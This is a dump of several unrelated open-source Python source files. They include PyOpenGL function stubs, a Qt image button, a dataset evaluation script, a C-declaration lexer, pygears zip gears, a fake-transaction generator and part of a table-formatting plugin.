@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiColor3fVertex3fSUN(rc,r,g,b,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiColor3fVertex3fvSUN(rc,c,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiColor4fNormal3fVertex3fSUN(rc,r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiColor4fNormal3fVertex3fvSUN(rc,c,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiColor4ubVertex3fSUN(rc,r,g,b,a,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLubyteArray,arrays.GLfloatArray)
def glReplacementCodeuiColor4ubVertex3fvSUN(rc,c,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiNormal3fVertex3fSUN(rc,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiNormal3fVertex3fvSUN(rc,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiTexCoord2fColor4fNormal3fVertex3fSUN(rc,s,t,r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiTexCoord2fColor4fNormal3fVertex3fvSUN(rc,tc,c,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiTexCoord2fNormal3fVertex3fSUN(rc,s,t,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiTexCoord2fNormal3fVertex3fvSUN(rc,tc,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiTexCoord2fVertex3fSUN(rc,s,t,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiTexCoord2fVertex3fvSUN(rc,tc,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiVertex3fSUN(rc,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray)
def glReplacementCodeuiVertex3fvSUN(rc,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fColor3fVertex3fSUN(s,t,r,g,b,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fColor3fVertex3fvSUN(tc,c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fColor4fNormal3fVertex3fSUN(s,t,r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fColor4fNormal3fVertex3fvSUN(tc,c,n,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fColor4ubVertex3fSUN(s,t,r,g,b,a,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLubyteArray,arrays.GLfloatArray)
def glTexCoord2fColor4ubVertex3fvSUN(tc,c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fNormal3fVertex3fSUN(s,t,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fNormal3fVertex3fvSUN(tc,n,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fVertex3fSUN(s,t,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fVertex3fvSUN(tc,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord4fColor4fNormal3fVertex4fSUN(s,t,p,q,r,g,b,a,nx,ny,nz,x,y,z,w):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord4fColor4fNormal3fVertex4fvSUN(tc,c,n,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord4fVertex4fSUN(s,t,p,q,x,y,z,w):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord4fVertex4fvSUN(tc,v):pass
|
laed/dataset/__init__.py | jaywalnut310/NeuralDialog-LAED | 195 | 12652728 | <reponame>jaywalnut310/NeuralDialog-LAED
# @Time : 12/4/17 4:28 PM
# @Author : <NAME> |
polymetis/polymetis/python/polymetis/utils/data_dir.py | ali-senguel/fairo | 669 | 12652732 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import polymetis
PKG_ROOT_DIR = polymetis.__path__[0]
DATA_DIR = os.path.join(PKG_ROOT_DIR, "data")
def get_full_path_to_urdf(path: str):
"""Gets the absolute path to a relative path of :code:`DATA_DIR`."""
if not os.path.isabs(path):
path = os.path.abspath(os.path.join(DATA_DIR, path))
assert os.path.exists(path), f"Invalid robot_description_path: {path}"
return path
def which(program: str):
"""Equivalent of `which <https://en.wikipedia.org/wiki/Which_(command)>`_ program.
Taken from https://stackoverflow.com/a/377028
Returns equivalent of $(which program), or None
if unable to find it.
Args:
program: name of the executable to find.
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, _fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
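
if __name__ == "__main__":
    # Illustrative check, not part of the original module: look up a common
    # executable on PATH (e.g. "ls" on Unix-like systems); prints None when
    # the executable cannot be found.
    print(which("ls"))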
|
nxt_editor/pixmap_button.py | Mikfr83/nxt_editor | 131 | 12652755 | <filename>nxt_editor/pixmap_button.py<gh_stars>100-1000
# External
from Qt import QtWidgets
from Qt import QtGui
from Qt import QtCore
class PixmapButton(QtWidgets.QAbstractButton):
"""https://stackoverflow.com/questions/2711033/how-code-a-image-button-in-pyqt"""
def __init__(self, pixmap, pixmap_hover, pixmap_pressed, pixmap_checked=None,
pixmap_checked_hover=None, pixmap_checked_pressed=None, size=32, checkable=False,
parent=None):
super(PixmapButton, self).__init__(parent=parent)
self.pixmap = pixmap
self.pixmap_hover = pixmap_hover
self.pixmap_pressed = pixmap_pressed
self.pixmap_checked = pixmap_checked
self.pixmap_checked_hover = pixmap_checked_hover
self.pixmap_checked_pressed = pixmap_checked_pressed
self.size = size
if checkable:
self.setCheckable(checkable)
self.pressed.connect(self.update)
self.released.connect(self.update)
self.action = None
def set_action(self, action):
self.action = action
# get properties
self.setToolTip(self.action.toolTip())
self.setWhatsThis(self.action.whatsThis())
# connect signals
action.triggered.connect(self.update_state)
action.toggled.connect(self.update_state)
if action.isCheckable():
self.toggled.connect(action.toggle)
else:
self.clicked.connect(action.trigger)
def update_state(self):
if self.action:
self.blockSignals(True)
self.setChecked(self.action.isChecked())
self.blockSignals(False)
def paintEvent(self, event):
if not isinstance(event, QtGui.QPaintEvent):
return
if self.isChecked():
pix = self.pixmap_checked_hover if self.underMouse() else self.pixmap_checked
if self.isDown():
pix = self.pixmap_checked_pressed
else:
pix = self.pixmap_hover if self.underMouse() else self.pixmap
if self.isDown():
pix = self.pixmap_pressed
painter = QtGui.QPainter(self)
painter.drawPixmap(event.rect(), pix)
del painter
def enterEvent(self, event):
self.update()
def leaveEvent(self, event):
self.update()
def sizeHint(self):
return QtCore.QSize(self.size, self.size) |
language/totto/prepare_references_for_eval.py | naveenjafer/language | 1,199 | 12652767 | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Processes references for eval (except for tokenization)."""
import json
import os
from absl import app
from absl import flags
from language.totto import table_to_text_utils
import six
FLAGS = flags.FLAGS
flags.DEFINE_string("input_path", None, "Input json file.")
flags.DEFINE_string("output_dir", None, "Output directory.")
flags.DEFINE_string("mode", None, "Either 'dev', or 'test'")
def get_references(json_example, mode="dev"):
"""Get references from json example."""
multi_reference = []
for annotation in json_example["sentence_annotations"]:
final_sentence = annotation["final_sentence"]
multi_reference.append(final_sentence)
if mode == "dev" or mode == "test":
while len(multi_reference) < 3:
multi_reference.append("<null>")
if mode == "dev" or mode == "test":
if json_example["overlap_subset"]:
multi_overlap_reference = multi_reference
multi_nonoverlap_reference = None
else:
multi_nonoverlap_reference = multi_reference
multi_overlap_reference = None
else:
multi_overlap_reference = None
multi_nonoverlap_reference = None
return multi_reference, multi_overlap_reference, multi_nonoverlap_reference
def get_parent_tables(json_example, mode="dev"):
"""Get tables in PARENT format for each json example."""
table = json_example["table"]
table_page_title = json_example["table_page_title"]
table_section_title = json_example["table_section_title"]
table_section_text = json_example["table_section_text"]
cell_indices = json_example["highlighted_cells"]
highlighted_subtable = (
table_to_text_utils.get_highlighted_subtable(
table=table, cell_indices=cell_indices))
# Get PARENT format code.
table_prec = table_to_text_utils.get_table_parent_format(
table=table,
table_page_title=table_page_title,
table_section_title=table_section_title,
table_section_text=table_section_text)
table_rec = table_to_text_utils.get_subtable_parent_format(
subtable=highlighted_subtable,
table_page_title=table_page_title,
table_section_title=table_section_title)
overlap_table_prec = None
overlap_table_rec = None
nonoverlap_table_prec = None
nonoverlap_table_rec = None
if mode == "dev" or mode == "test":
if json_example["overlap_subset"]:
overlap_table_prec = table_prec
overlap_table_rec = table_rec
else:
nonoverlap_table_prec = table_prec
nonoverlap_table_rec = table_rec
return (table_prec, table_rec, overlap_table_prec, overlap_table_rec,
nonoverlap_table_prec, nonoverlap_table_rec)
def write_references(references, output_path_base):
"""Write single and multiple references to file."""
# Just write a single reference file for now.
with open(output_path_base, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[0].lower() + "\n")
# Write out multireferences.
if FLAGS.mode == "dev" or FLAGS.mode == "test":
output_path_multi0 = output_path_base + "-multi0"
with open(output_path_multi0, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[0].lower() + "\n")
output_path_multi1 = output_path_base + "-multi1"
with open(output_path_multi1, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[1].lower() + "\n")
output_path_multi2 = output_path_base + "-multi2"
with open(output_path_multi2, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[2].lower() + "\n")
def write_table_parent_format(tables, output_path):
with open(output_path, "w", encoding="utf-8") as f:
for table in tables:
f.write(table.lower() + "\n")
def main(_):
input_path = FLAGS.input_path
output_dir = FLAGS.output_dir
all_references = []
overlap_references = []
nonoverlap_references = []
parent_prec_tables = []
parent_rec_tables = []
overlap_parent_prec_tables = []
overlap_parent_rec_tables = []
nonoverlap_parent_prec_tables = []
nonoverlap_parent_rec_tables = []
with open(input_path, "r", encoding="utf-8") as input_file:
for line in input_file:
line = six.ensure_text(line, "utf-8")
json_example = json.loads(line)
multi_reference, multi_overlap_reference, multi_nonoverlap_reference = (
get_references(json_example, FLAGS.mode))
all_references.append(multi_reference)
if multi_overlap_reference:
overlap_references.append(multi_overlap_reference)
if multi_nonoverlap_reference:
nonoverlap_references.append(multi_nonoverlap_reference)
(table_prec, table_rec, overlap_table_prec, overlap_table_rec,
nonoverlap_table_prec, nonoverlap_table_rec) = (
get_parent_tables(json_example, FLAGS.mode))
parent_prec_tables.append(table_prec)
parent_rec_tables.append(table_rec)
if overlap_table_prec and overlap_table_rec:
overlap_parent_prec_tables.append(overlap_table_prec)
overlap_parent_rec_tables.append(overlap_table_rec)
if nonoverlap_table_prec and nonoverlap_table_rec:
nonoverlap_parent_prec_tables.append(nonoverlap_table_prec)
nonoverlap_parent_rec_tables.append(nonoverlap_table_rec)
print("Writing references.")
all_output_path_base = os.path.join(output_dir, "references")
overlap_output_path_base = os.path.join(output_dir, "overlap_references")
nonoverlap_output_path_base = os.path.join(output_dir,
"nonoverlap_references")
write_references(all_references, all_output_path_base)
write_references(overlap_references, overlap_output_path_base)
write_references(nonoverlap_references, nonoverlap_output_path_base)
print("Writing tables in PARENT format.")
all_table_prec_path = os.path.join(output_dir,
"tables_parent_precision_format")
all_table_rec_path = os.path.join(output_dir, "tables_parent_recall_format")
overlap_table_prec_path = os.path.join(
output_dir, "overlap_tables_parent_precision_format")
overlap_table_rec_path = os.path.join(output_dir,
"overlap_tables_parent_recall_format")
nonoverlap_table_prec_path = os.path.join(
output_dir, "nonoverlap_tables_parent_precision_format")
nonoverlap_table_rec_path = os.path.join(
output_dir, "nonoverlap_tables_parent_recall_format")
write_table_parent_format(parent_prec_tables, all_table_prec_path)
write_table_parent_format(parent_rec_tables, all_table_rec_path)
write_table_parent_format(overlap_parent_prec_tables, overlap_table_prec_path)
write_table_parent_format(overlap_parent_rec_tables, overlap_table_rec_path)
write_table_parent_format(nonoverlap_parent_prec_tables,
nonoverlap_table_prec_path)
write_table_parent_format(nonoverlap_parent_rec_tables,
nonoverlap_table_rec_path)
if __name__ == "__main__":
flags.mark_flags_as_required(["input_path", "output_dir", "mode"])
app.run(main)
|
WebMirror/management/rss_parser_funcs/feed_parse_extractAlpenGlowTranslations.py | fake-name/ReadableWebProxy | 193 | 12652790 | def extractAlpenGlowTranslations(item):
"""
'Alpen Glow Translations'
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or 'preview' in item['title'].lower():
return None
tagmap = {
'<NAME>' : 'The Legend of the Concubine\'s Daughter Minglan',
}
for tag, sname in tagmap.items():
if tag in item['tags']:
return buildReleaseMessageWithType(item, sname, vol, chp, frag=frag)
return False |
pygears/lib/czip.py | bogdanvuk/pygears | 120 | 12652808 | <reponame>bogdanvuk/pygears
from pygears import module
from pygears.sim import delta
from pygears.typing import Queue, Tuple, typeof
from pygears import gear, alternative
from pygears.lib.shred import shred
from .ccat import ccat
from .permute import permuted_apply
from .cat_util import din_data_cat_value
from functools import reduce
from pygears.util.utils import gather
def lvl_if_queue(t):
if not issubclass(t, Queue):
return 0
else:
return t.lvl
def data_if_queue(t):
if not issubclass(t, Queue):
return t
else:
return t[0]
def zip_type(dtypes):
arg_queue_lvl = list(map(lvl_if_queue, dtypes))
base_type = Tuple[tuple(map(data_if_queue, dtypes))]
# If there are no Queues, i.e. max(arg_queue_lvl) == 0, the type below
# will resolve to just base_type
return Queue[base_type, max(arg_queue_lvl)]
@gear
async def zip_cat(*din) -> b'zip_type(din)':
id_max_lvl, max_lvl = max(enumerate(din),
key=lambda p: p[1].dtype.lvl if typeof(p[1].dtype, Queue) else 0)
async with gather(*din) as dout:
yield (din_data_cat_value(dout), dout[id_max_lvl].eot)
def isort(iterable, key=lambda x: x, reverse=False):
res = sorted(enumerate(iterable), key=key, reverse=reverse)
values = tuple(d[1] for d in res)
indices = tuple(d[0] for d in res)
return values, indices
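# Illustrative example (not from the original source): the key is applied to
# (index, value) pairs, as in the czip() call below, and both the sorted
# values and their original positions are returned, e.g.
#   isort(['b', 'a', 'c'], key=lambda p: p[1]) == (('a', 'b', 'c'), (1, 0, 2))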
@gear
def czip2(a, b) -> b'zip_type((a, b))':
return (a, b) | zip_sync(outsync=False) | zip_cat
@gear
def czip(*din):
if len(din) == 2:
return czip2(*din)
# Sort input interfaces in descending order of their Queue levels, i.e. we
# want to zip highest Queue levels first in order to synchronize them first
din_sorted_by_lvl, din_sort_indices = isort(din,
key=lambda x: lvl_if_queue(x[1].dtype),
reverse=True)
# Zip din's in sorted order using it as a binary operation. This will
# produce nested Tuple's, hence we cast it to a Queue of single Tuple
ret_flat_type = zip_type([d.dtype for d in din_sorted_by_lvl])
def czip_cascade(*din):
return reduce(czip, din) >> ret_flat_type
return permuted_apply(*din, f=czip_cascade, indices=din_sort_indices)
@gear
def unzip(din, *, dtypes):
zdata, zlast = din
def split():
for i, d in enumerate(dtypes):
data = zdata[i]
if issubclass(d, Queue):
yield ccat(data, zlast[:d.lvl]) | Queue[data.dtype, d.lvl]
else:
yield data
return tuple(split())
@gear(enablement=b'len(din) == 2')
async def zip_sync(*din, outsync=True) -> b'din':
lvls = tuple(d.dtype.lvl if typeof(d.dtype, Queue) else 0 for d in din)
overlap_lvl = min(lvls)
eot_aligned = (1, 1)
while (1):
din_data = [(await d.pull()) for d in din]
if overlap_lvl > 0:
eot_overlap = [d.eot[:overlap_lvl] for d in din_data]
eot_aligned = (eot_overlap[0] >= eot_overlap[1], eot_overlap[1] >= eot_overlap[0])
else:
eot_aligned = (1, 1)
eot_overlap = din_data[0].eot if lvls[0] else din_data[1].eot
if all(eot_aligned):
yield din_data
else:
await delta()
for d, aligned in zip(din, eot_aligned):
if (not aligned) or all(eot_aligned):
d.ack()
@alternative(zip_sync)
@gear(enablement=b'len(din) > 2')
def zip_sync_vararg(*din):
return din | czip | unzip(dtypes=[d.dtype for d in din])
@gear
def zip_sync_with(sync_in, din, *, balance=None):
if balance:
sync_in = sync_in | balance
din_sync, sync_in_sync = zip_sync(din, sync_in)
sync_in_sync | shred
return din_sync
@gear
def zip_wrap_with(sync, din):
din_zip = czip(sync, din)
return ccat(din_zip['data'][1], din_zip['eot']) | Queue
|
pkgs/tools/yasm/src/tools/python-yasm/pyxelator/lexer.py | manggoguy/parsec-modified | 2,151 | 12652832 | #!/usr/bin/env python
""" cdecl.py - parse c declarations
(c) 2002, 2003, 2004, 2005 <NAME> <<EMAIL>>
Released under GNU LGPL license.
version 0.xx
"""
import sys
import string
import types
import copy
#from cparse import BasicType, Qualifier, StorageClass, Typedef, Ellipses, GCCBuiltin
#from cparse import *
import cparse as host
class LexError(Exception):
pass
class Lexer(object):
def __init__(self,s="",verbose=0,**kw):
self.verbose = verbose
self.lookup = {} # a map for keywords and typedefs
for t in \
"float double void char int".split():
self.lookup[t] = host.BasicType( t )
for t in \
"register signed unsigned short long const volatile inline".split(): # inline here ???
self.lookup[t] = host.Qualifier( t )
for t in "extern static auto".split():
self.lookup[t] = host.StorageClass( t )
self.lookup['typedef'] = host.Typedef()
#self.lookup['__inline__'] = host.GCCBuiltin('__inline__')
#self.lookup['__extension__'] = host.Qualifier('__extension__')
self.lookup['...'] = host.Ellipses()
if s:
self.lex(s)
for key in kw.keys():
self.__dict__[key] = kw[key]
def lex(self,s):
self.stack = None
self.lines = s.splitlines()
self.set_state("","",0,0)
self.so_file = ""
self._newline()
self.get_token() # start
def mktypedef(self,tok,node):
if self.verbose:
print "%s.mktypedef(%s,%s)"%(self,tok,node)
self.lookup[ tok ] = node
def rmtypedef(self,tok):
" used in round trip testing "
# print "# rmtypedef(%s)"%tok
assert isinstance( self.lookup[ tok ], host.Node ) # existance
del self.lookup[ tok ]
def _get_kind(self,tok):
#print '_get_kind(%s)'%tok,self.lookup
try:
return self.lookup[tok]
#return self.lookup[tok].clone()
except KeyError:
if tok.startswith("__builtin"):
node = host.GCCBuiltin(tok)
self.lookup[tok] = node
return node
#elif tok in ( "__extension__", ):
#node = GCCBuiltin(tok)
#self.lookup[tok] = node
#return node
return None
def _newline(self):
while self.lno < len(self.lines):
line = self.lines[self.lno]
if not line or line[0] != "#":
break
l = line.split('"')
assert len(l)>=2
self.so_file = l[1]
#self.so_lno = int( l[0].split()[1] )
#sys.stderr.write("# %s %s: %s\n"%(so_lno,so_file,l))
self.lno+=1
def get_brace_token( self ):
self.push_state()
ident_chars0 = string.letters+"_"
ident_chars1 = string.letters+string.digits+"_"
tok, kind = "", ""
while self.lno < len(self.lines):
s = self.lines[self.lno]
i=self.col
while i < len(s):
if s[i] not in '{}':
i=i+1
continue
else:
tok = s[i]
kind = tok
self.col = i+1
break
# keep moving
#sys.stderr.write( "lexer ignoring '%s'\n"%s[i] )
i=i+1
if i==len(s):
# nothing found
assert tok == ""
self.col=0
self.lno+=1
self._newline()
else:
assert tok
break
self.set_state(tok,kind,self.lno,self.col)
def get_token(self):
self.push_state()
ident_chars0 = string.letters+"_"
ident_chars1 = string.letters+string.digits+"_"
tok, kind = "", ""
while self.lno < len(self.lines):
s = self.lines[self.lno]
i=self.col
while i < len(s):
if s[i].isspace():
i=i+1
continue
#if s[i] in ident_chars0:
if s[i].isalpha() or s[i]=='_':
# identifier
j=i+1
while j<len(s):
if s[j] in ident_chars1:
j=j+1
else:
break
tok = s[i:j]
self.col = j
kind = self._get_kind(tok)
break
if s[i].isdigit() or \
(i+1<len(s) and s[i] in '+-.' and s[i+1].isdigit()):
# number literal
is_float = s[i]=='.'
is_hex = s[i:i+2]=='0x'
if is_hex:
i=i+2
assert s[i].isdigit() or s[i] in "abcdefABCDEF", self.err_string()
j=i+1
while j<len(s):
#print "lex ",repr(s[i]),is_float
if s[j].isdigit() or (is_hex and s[j] in "abcdefABCDEF"):
j=j+1
elif s[j]=='.' and not is_float:
assert not is_hex
j=j+1
is_float=1
else:
break
tok = s[i:j]
self.col = j
if is_float:
kind = float(tok)
elif is_hex:
kind = int(tok,16)
else:
kind = int(tok)
break
if s[i:i+3]=='...':
# ellipses
#sys.stderr.write( "ELLIPSES "+str(self.get_state()) )
tok = s[i:i+3]
kind = self._get_kind(tok)
self.col = i+3
break
if s[i] in '*/{}()[]:;,=+-~.<>|&':
tok = s[i]
kind = tok
self.col = i+1
break
if s[i] == "'":
j = i+2
while j<len(s) and s[j]!="'":
j+=1
if j==len(s):
raise LexError( self.err_string() + "unterminated char constant" )
tok = s[i:j+1]
self.col = j+1
kind = s[i:j+1]
break
# keep moving
#sys.stderr.write( "lexer ignoring '%s'\n"%s[i] )
sys.stderr.write( "lexer ignoring '%s' lno=%d\n"%(s[i],self.lno+1) )
i=i+1
# end while i < len(s)
if i==len(s):
# nothing found, go to next line
assert tok == ""
self.col=0
self.lno+=1
self._newline()
else:
# we got one
assert tok
break
# end while self.lno < len(self.lines):
self.set_state(tok,kind,self.lno,self.col)
def err_string(self):
"Return helpful error string :)"
return self.lines[self.lno]+"\n"+" "*self.col+"^\n"
def push_state(self):
self.stack = self.get_state() # a short stack :)
#self.stack.push( self.get_state() )
def unget_token(self):
assert self.stack is not None
self.set_state(*self.stack)
self.stack = None
def set_state(self,tok,kind,lno,col):
if self.verbose:
print "tok,kind,lno,col = ",(tok,kind,lno,col)
self.tok = tok
self.kind = kind
self.lno = lno # line
self.col = col # column
def get_state(self):
return self.tok,self.kind,self.lno,self.col
def get_file(self):
return self.so_file
###################################################################
#
###################################################################
#
|
general/detect-fraudulent-transactions/transactions.py | caesarcc/python-code-tutorials | 1,059 | 12652838 | <filename>general/detect-fraudulent-transactions/transactions.py
from random import choices, randint
from string import ascii_letters, digits
account_chars: str = digits + ascii_letters
def _random_account_id() -> str:
"""Return a random account number made of 12 characters"""
return "".join(choices(account_chars,k=12))
def _random_amount() -> float:
"""Return a random amount between 1.00 and 1000.00"""
return randint(100,1000000)/100
def create_random_transaction() -> dict:
"""Create a fake randomised transaction."""
return {
"source":_random_account_id()
,"target":_random_account_id()
,"amount":_random_amount()
,"currency":"EUR"
} |
table_base.py | akrabat/SublimeTableEditor | 313 | 12652854 | # table_base.py - Key classes and methods for pretty print text table.
# Copyright (C) 2012 Free Software Foundation, Inc.
# Author: <NAME>
# Package: SublimeTableEditor
# Homepage: https://github.com/vkocubinsky/SublimeTableEditor
# This file is part of SublimeTableEditor.
# SublimeTableEditor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# SublimeTableEditor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with SublimeTableEditor. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import division
import math
import re
import csv
try:
from . import table_line_parser as tparser
from .widechar_support import wlen, wcount
except ValueError:
import table_line_parser as tparser
from widechar_support import wlen, wcount
class TableConfiguration:
def __init__(self):
self.keep_space_left = False
self.align_number_right = True
self.detect_header = True
self.intelligent_formatting = True
#only for simple syntax
self.hline_out_border = None
self.hline_in_border = None
self.custom_column_alignment = True
class TableSyntax:
def __init__(self, name, table_configuration):
self.name = name
self.table_configuration = table_configuration or TableConfiguration()
self.align_number_right = self.table_configuration.align_number_right
self.detect_header = self.table_configuration.detect_header
self.keep_space_left = self.table_configuration.keep_space_left
self.intelligent_formatting = self.table_configuration.intelligent_formatting
self.line_parser = tparser.LineParserPlus("(?:[|])")
# Must be set in sublass constructor
self.table_parser = None
self.table_driver = None
class Column(object):
ALIGN_LEFT = 'left'
ALIGN_RIGHT = 'right'
ALIGN_CENTER = 'center'
def __init__(self, row):
self.row = row
self.table = row.table
self.syntax = row.table.syntax
self.col_len = 0
self.align = None
self.header = None
self.colspan = 1
self.rowspan = 1
self.pseudo_columns = []
self.left_border_text = '|'
self.right_border_text = '|'
def min_len(self):
raise NotImplementedError
def render(self):
raise NotImplementedError
def align_follow(self):
return None
def pseudo(self):
return False
class PseudoColumn(Column):
def __init__(self, row, master_column):
Column.__init__(self, row)
self.master_column = master_column
self.data = ''
def render(self):
return ''
def min_len(self):
return self.master_column.min_len()
def pseudo(self):
return True
class Row:
def __init__(self, table):
self.table = table
self.syntax = table.syntax
self.columns = []
def __getitem__(self, index):
return self.columns[index]
def __len__(self):
return len(self.columns)
def is_header_separator(self):
return False
def is_separator(self):
return False
def is_data(self):
return False
def is_align(self):
return False
def append(self, column):
self.columns.append(column)
for i in range(0, column.colspan - 1):
psedo_column = PseudoColumn(self, column)
column.pseudo_columns.append(psedo_column)
self.columns.append(psedo_column)
def new_empty_column(self):
raise NotImplementedError
def create_column(self, text):
raise NotImplementedError
def render(self):
r = ""
for ind, column in enumerate(self.columns):
if column.pseudo():
continue
if ind == 0:
r += self.convert_border(column.left_border_text)
r += column.render()
r += self.convert_border(column.right_border_text)
return r
def convert_border(self, border_text):
# if separator converts to data
return border_text.replace('+', '|')
class DataRow(Row):
def new_empty_column(self):
return DataColumn(self, '')
def create_column(self, text):
return DataColumn(self, text)
def is_data(self):
return True
class DataColumn(Column):
def __init__(self, row, data):
Column.__init__(self, row)
self.data = data
self.left_space = ' '
self.right_space = ' '
def _norm(self):
if self.syntax.keep_space_left:
if self.header:
norm = self.data.strip()
else:
norm = self.data.rstrip()
if norm[:1] == ' ':
norm = norm[1:]
else:
norm = self.data.strip()
return norm
def min_len(self):
return int(math.ceil(self.total_min_len()/self.colspan))
def total_min_len(self):
# min of ' ' or ' xxxx '
space_len = len(self.left_space) + len(self.right_space)
total_min_len = max(space_len + 1, wlen(self._norm()) + space_len)
total_min_len = (total_min_len
+ (len(self.left_border_text) - 1)
+ (len(self.right_border_text) - 1))
return total_min_len
def render(self):
# colspan -1 is count of '|'
